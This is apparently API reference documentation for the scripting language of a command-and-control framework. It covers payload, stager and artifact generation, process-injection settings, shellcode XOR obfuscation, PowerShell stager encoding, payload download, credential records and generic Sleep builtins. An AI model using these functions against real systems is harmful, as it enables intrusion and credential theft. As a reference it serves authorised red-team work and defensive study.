beacon_exploits() -- List registered elevation exploits.

Returns: @array of exploit names.

beacon_elevators¶

beacon_elevators() -- Alias for beacon_exploits().

beacon_remote_exploits¶

beacon_remote_exploits() -- List registered lateral movement techniques.

Returns: @array of remote exploit names.

beacon_remote_exec_methods¶

beacon_remote_exec_methods() -- List remote-exec methods.

Returns: @array of method names (built-in + CNA-registered).

Payload Generation¶

stager¶

stager($listener, $arch) -- Generate a stager payload.

Returns: Raw stager bytes.

$stager = stager("HTTPS", "x64");

payload¶

payload($listener, $arch) -- Generate a full payload.

Returns: Raw payload bytes.

$payload = payload("HTTPS", "x64");

artifact_payload¶

artifact_payload($listener, $type, $arch) -- Generate an artifact payload (EXE, DLL).

Returns: Artifact bytes.

$exe = artifact_payload("HTTPS", "exe", "x64");

artifact_stager¶

artifact_stager($listener, $type, $arch) -- Generate an artifact stager.

Returns: Stager artifact bytes.

artifact_general¶

artifact_general($data, $type) -- Generate a general artifact from raw data.

Returns: Artifact bytes.

payload_local¶

payload_local($listener, $arch) -- Generate a local payload.

Returns: Payload bytes.

payload_bootstrap_hint¶

payload_bootstrap_hint($listener) -- Get bootstrap hint for a listener.

Returns: Bootstrap data string.

PE Manipulation¶

%pe = pedump($pe_bytes);
println(%pe["arch"]);

Process Injection Config¶

$config = pi_spawn_get();
pi_spawn_set("technique", "CreateRemoteThread");
$info = pi_spawn_info();

Report DSL¶

Report Data¶

agCredentials¶

agCredentials() -- Get credentials for reporting.

Returns: @array of credential records.

agTargets¶

agTargets() -- Get targets for reporting.

agSessions¶

agSessions() -- Get session history for reporting.

agApplications¶

agApplications() -- Get applications for reporting.

agTokens¶

agTokens() -- Get token data for reporting.

agC2info¶

agC2info() -- Get C2 infrastructure info for reporting.

agServices¶

agServices() -- Get service data for reporting.

Utility: General¶

base64_encode¶

base64_encode($data) -- Base64 encode data.

Returns: string base64-encoded result.

$encoded = base64_encode("Hello World");

base64_decode¶

base64_decode($data) -- Base64 decode data.

Returns: Decoded bytes as string.

$decoded = base64_decode($encoded);

str_encode¶

str_encode($data, $encoding) -- Encode string to specified encoding.

mynick¶

mynick() -- Get current operator nickname.

Returns: string nickname.

println("Operator: " . mynick());

tstamp¶

tstamp($epoch) -- Format epoch timestamp as human-readable string.

Returns: Formatted date string.

println(tstamp(ticks()));

ticks¶

ticks() -- Get current time in milliseconds.

Returns: long milliseconds since epoch.

script_resource¶

script_resource($path) -- Resolve a path relative to the running script.

Returns: Absolute path string.

$bof = script_resource("bofs/whoami.o");

formatDate¶

formatDate($epoch, $format) -- Format epoch timestamp with pattern.

Returns: Formatted date string.

Utility: String¶

dstamp¶

dstamp($epoch) -- Format epoch as short date stamp.

format_size¶

format_size($bytes) -- Format byte count as human-readable size.

Returns: string like "1.5 MB".

println(format_size(1572864));  # "1.5 MB"

encode¶

encode($data, $encoding) -- Encode data with specified encoding.

str_chunk¶

str_chunk($data, $size) -- Split string into chunks.

Returns: @array of chunk strings.

str_decode¶

str_decode($data, $encoding) -- Decode encoded data.

str_xor¶

str_xor($data, $key) -- XOR string with key.

Returns: XOR result bytes.

$xored = str_xor($shellcode, "key123");

Utility: Network¶

sync_download¶

sync_download($url) -- Download a URL synchronously.

Returns: Downloaded content as string.

$content = sync_download("http://10.10.10.5/payload.bin");

tokenToEmail¶

tokenToEmail($token) -- Extract email from JWT token.

Returns: Email string.

url_open¶

url_open($url) -- Open a URL in the default browser.

users¶

users() -- Get connected operator users.

Returns: @array of user info.

closeClient¶

closeClient() -- Disconnect from the teamserver.

fireEvent¶

fireEvent($event_name, $args...) -- Fire a named event.

Utility: Compression¶

gzip¶

gzip($data) -- Gzip compress data.

Returns: Compressed bytes.

$compressed = gzip($payload);

gunzip¶

gunzip($data) -- Gzip decompress data.

Returns: Decompressed bytes.

$original = gunzip($compressed);

Utility: Transform¶

transform¶

transform($data, $transform_name) -- Apply a named transform to data.

Returns: Transformed bytes.

transform_vbs¶

transform_vbs($data) -- Transform data to VBScript format.

Returns: VBScript-encoded string.

PowerShell Utility¶

powershell_command¶

powershell_command($cmd) -- Build a PowerShell one-liner command string.

Returns: string powershell command.

$pscmd = powershell_command("Get-Process");

powershell_compress¶

powershell_compress($script) -- Compress PowerShell script for delivery.

Returns: Compressed script string.

powershell_encode_oneliner¶

powershell_encode_oneliner($cmd) -- Encode as PowerShell -EncodedCommand.

Returns: string encoded one-liner.

powershell_encode_stager¶

powershell_encode_stager($cmd) -- Encode as PowerShell stager.

Returns: string stager command.

Attack (MITRE)¶

attack_describe¶

attack_describe($technique_id) -- Get ATT&CK technique description.

Returns: string description.

println(attack_describe("T1003.001"));

attack_name¶

attack_name($technique_id) -- Get ATT&CK technique name.

Returns: string name.

println(attack_name("T1003"));  # "OS Credential Dumping"

attack_detect¶

attack_detect($technique_id) -- Get detection guidance.

Returns: string detection methods.

attack_mitigate¶

attack_mitigate($technique_id) -- Get mitigation guidance.

Returns: string mitigations.

attack_tactics¶

attack_tactics($technique_id) -- Get associated tactics.

Returns: @array of tactic names.

attack_url¶

attack_url($technique_id) -- Get ATT&CK page URL.

Returns: string URL.

println(attack_url("T1059.001"));

Predicates¶

Predicate functions evaluate beacon properties and return TRUE or FALSE. Available with both - prefix (CS convention) and without.

-is64 / is64¶

-is64($bid) -- Check if beacon is 64-bit.

if (-is64($1)) {
    println("64-bit beacon");
}

-isadmin / isadmin¶

-isadmin($bid) -- Check if beacon has admin privileges.

if (-isadmin($1)) {
    bgetsystem($1);
}

-isactive / isactive¶

-isactive($bid) -- Check if beacon is active (within 3x sleep interval).

-isbeacon / isbeacon¶

-isbeacon($bid) -- Check if entry is a beacon (always true for beacons).

-isssh / isssh¶

-isssh($bid) -- Check if session is SSH.

-islinux / islinux¶

-islinux($bid) -- Check if beacon is on Linux.

Preferences¶

pref_get¶

pref_get($key) -- Get a preference value.

Returns: Preference value or $null.

$value = pref_get("my.setting");

pref_set¶

pref_set($key, $value) -- Set a preference value.

pref_set("my.setting", "enabled");

Setup¶

setup_strings¶

setup_strings() -- Get setup string configuration.

Returns: Setup strings hash.

setup_transformations¶

setup_transformations() -- Get setup transformation configuration.

Returns: Setup transformations data.

Listener Lifecycle¶

listener_create¶

listener_create($name, $type, %config) -- Create a new listener.

listener_create("HTTPS Relay", "https", %(host => "10.0.0.50", port => 443));

listener_create_ext¶

listener_create_ext($name, $type, %config) -- Create an external listener.

listener_delete¶

listener_delete($name) -- Delete a listener.

listener_delete("Old Listener");

listener_describe¶

listener_describe($name) -- Get listener details (alias for listener_info).

Returns: %hash of listener configuration.

listener_restart¶

listener_restart($name) -- Restart a listener.

listener_restart("HTTPS Relay");

listener_pivot_create¶

listener_pivot_create($name, $type, %config) -- Create a pivot listener.

VPN¶

vpn_tap_create¶

vpn_tap_create($bid, $interface) -- Create a VPN TAP interface.

vpn_tap_delete¶

vpn_tap_delete($interface) -- Delete a VPN TAP interface.

vpn_interfaces¶

vpn_interfaces() -- List VPN interfaces.

Returns: @array of interface info.

SSH Registration¶

ssh_command_register¶

ssh_command_register($name, $callback) -- Register a custom SSH command.

ssh_command_register("recon", &ssh_recon);

ssh_command_describe¶

ssh_command_describe($name) -- Get SSH command description.

Returns: string description.

Credentials & Host¶

credential_add¶

credential_add($user, $password, $realm, $source) -- Add a credential to the data model.

credential_add("admin", "Password1!", "CORP.LOCAL", "hashdump");

credential_remove¶

credential_remove($user, $realm) -- Remove a credential.

credential_remove("admin", "CORP.LOCAL");

arch¶

arch($bid) -- Get beacon architecture.

Returns: string -- "x64" or "x86".

println("Arch: " . arch($bid));

host_update¶

host_update($address, $key, $value) -- Update host information in the data model.

host_update("10.10.10.5", "os", "Windows Server 2019");

localip¶

localip() -- Get local IP address.

Returns: string IP address.

Range¶

range¶

range($start, $end) -- Generate a numeric range.

Returns: @array of integers from start to end.

@nums = range(1, 10);

iprange¶

iprange($cidr) -- Expand a CIDR range to individual IPs.

Returns: @array of IP address strings.

@ips = iprange("192.168.1.0/24");

Reflective Loader¶

setup_reflective_loader¶

setup_reflective_loader($loader_data) -- Configure the reflective DLL loader.

setup_reflective_loader($custom_loader);

Sleep Builtins¶

These are the core Sleep language functions available in all CNA scripts.

Output¶

println¶

println($value) -- Print a value followed by a newline.

println("Hello, World!");
println(42);

print¶

print($value) -- Print a value without a trailing newline.

print("Loading...");

Type Conversion¶

casti¶

casti($value) -- Cast value to integer.

Returns: int

$num = casti("42");

castd¶

castd($value) -- Cast value to double.

Returns: double

castl¶

castl($value) -- Cast value to long.

Returns: long

asc¶

asc($char) -- Get ASCII code of a character.

Returns: int ASCII value.

println(asc("A"));  # 65

chr¶

chr($code) -- Get character from ASCII code.

Returns: string single character.

println(chr(65));  # "A"

typeof¶

typeof($value) -- Get type name of a value.

Returns: string type name.

println(typeof(@()));  # "array"

String Manipulation¶

charAt¶

charAt($string, $index) -- Get character at index.

Returns: string single character.

println(charAt("Hello", 0));  # "H"

indexOf¶

indexOf($string, $search, [$start]) -- Find index of substring.

Returns: int index or -1.

println(indexOf("Hello World", "World"));  # 6

lc¶

lc($string) -- Convert to lowercase.

Returns: string

println(lc("HELLO"));  # "hello"

uc¶

uc($string) -- Convert to uppercase.

Returns: string

println(uc("hello"));  # "HELLO"

left¶

left($string, $count) -- Get leftmost characters.

Returns: string

println(left("Hello", 3));  # "Hel"

right¶

right($string, $count) -- Get rightmost characters.

Returns: string

println(right("Hello", 3));  # "llo"

substr¶

substr($string, $start, [$end]) -- Extract substring.

Returns: string

println(substr("Hello World", 6));     # "World"
println(substr("Hello World", 0, 5));  # "Hello"

strlen¶

strlen($string) -- Get string length.

Returns: int

println(strlen("Hello"));  # 5

strrep¶

strrep($string, $old, $new) -- Replace all occurrences of a substring.

Returns: string

println(strrep("foo bar foo", "foo", "baz"));  # "baz bar baz"

trim¶

trim($string) -- Remove leading/trailing whitespace.

Returns: string

println(trim("  hello  "));  # "hello"

replace¶

replace($string, $pattern, $replacement) -- Regex replace.

Returns: string

println(replace("Hello 123", "\\d+", "456"));  # "Hello 456"

split¶

split($delimiter, $string) -- Split string by delimiter.

Returns: @array

@parts = split(",", "a,b,c");

join¶

join($delimiter, @array) -- Join array elements.

Returns: string

println(join(", ", @("a", "b", "c")));  # "a, b, c"

format¶

format($format_string, $args...) -- Format string (printf-style).

Returns: string

println(format("Host: %s Port: %d", "10.10.10.5", 443));

matches¶

matches($string, $pattern) -- Regex match test.

Returns: @array of matches or $null.

@m = matches("Hello World 123", "\\d+");

Array Operations¶

push¶

push(@array, $value) -- Push value onto end of array.

@list = @();
push(@list, "item1");
push(@list, "item2");

pop¶

pop(@array) -- Remove and return last element.

Returns: Removed element.

$last = pop(@list);

shift¶

shift(@array) -- Remove and return first element.

Returns: Removed element.

$first = shift(@list);

add¶

add(@array, $value, [$index]) -- Add value at index (or end).

add(@list, "new", 0);  # Insert at beginning

addAll¶

addAll(@dest, @source) -- Add all elements from source to dest.

addAll(@combined, @extra);

copy¶

copy(@array) -- Create a shallow copy.

Returns: @array new copy.

@clone = copy(@original);

removeAll¶

removeAll(@array, @to_remove) -- Remove matching elements.

removeAll(@list, @("unwanted"));

removeAt¶

removeAt(@array, $index) -- Remove element at index.

Returns: Removed element.

$removed = removeAt(@list, 0);

retainAll¶

retainAll(@array, @to_keep) -- Keep only matching elements.

retainAll(@list, @("keep1", "keep2"));

reverse¶

reverse(@array) -- Reverse array in place.

reverse(@list);

size¶

size($collection) -- Get size of array, hash, or string.

Returns: int element count.

println(size(@list));
println(size(%hash));

sorta¶

sorta(@array) -- Sort array alphabetically (ascending).

sorta(@names);

sortd¶

sortd(@array) -- Sort array alphabetically (descending).

sortd(@names);

sortn¶

sortn(@array) -- Sort array numerically.

sortn(@numbers);

sublist¶

sublist(@array, $start, [$end]) -- Extract a sublist.

Returns: @array slice.

@first3 = sublist(@list, 0, 3);

Hash Operations¶

keys¶

keys(%hash) -- Get all keys from a hash.

Returns: @array of key strings.

foreach $key (keys(%config)) {
    println($key . " = " . %config[$key]);
}

values¶

values(%hash) -- Get all values from a hash.

Returns: @array of values.

putAll¶

putAll(%dest, %source) -- Merge source hash into dest.

putAll(%combined, %extra);

ohash¶

ohash() -- Create an ordered hash (preserves insertion order).

Returns: %hash ordered hash.

%ordered = ohash();
%ordered["first"] = 1;
%ordered["second"] = 2;

Math¶

rand¶

rand($max) -- Generate random integer.

Returns: int from 0 to max-1.

$port = rand(65535);

expr¶

expr($expression) -- Evaluate a math expression.

Returns: Numeric result.

$result = expr("2 + 3 * 4");  # 14

Miscellaneous¶

sleep¶

sleep($ms) -- Pause execution for milliseconds.

sleep(1000);  # Wait 1 second

ticks¶

ticks() -- Get current time in milliseconds.

Returns: long epoch milliseconds.

$start = ticks();
# ... do work ...
$elapsed = ticks() - $start;
println("Took " . $elapsed . "ms");

Cross-references: Language Guide for Sleep syntax basics, Hooks & Events for event-driven scripting patterns.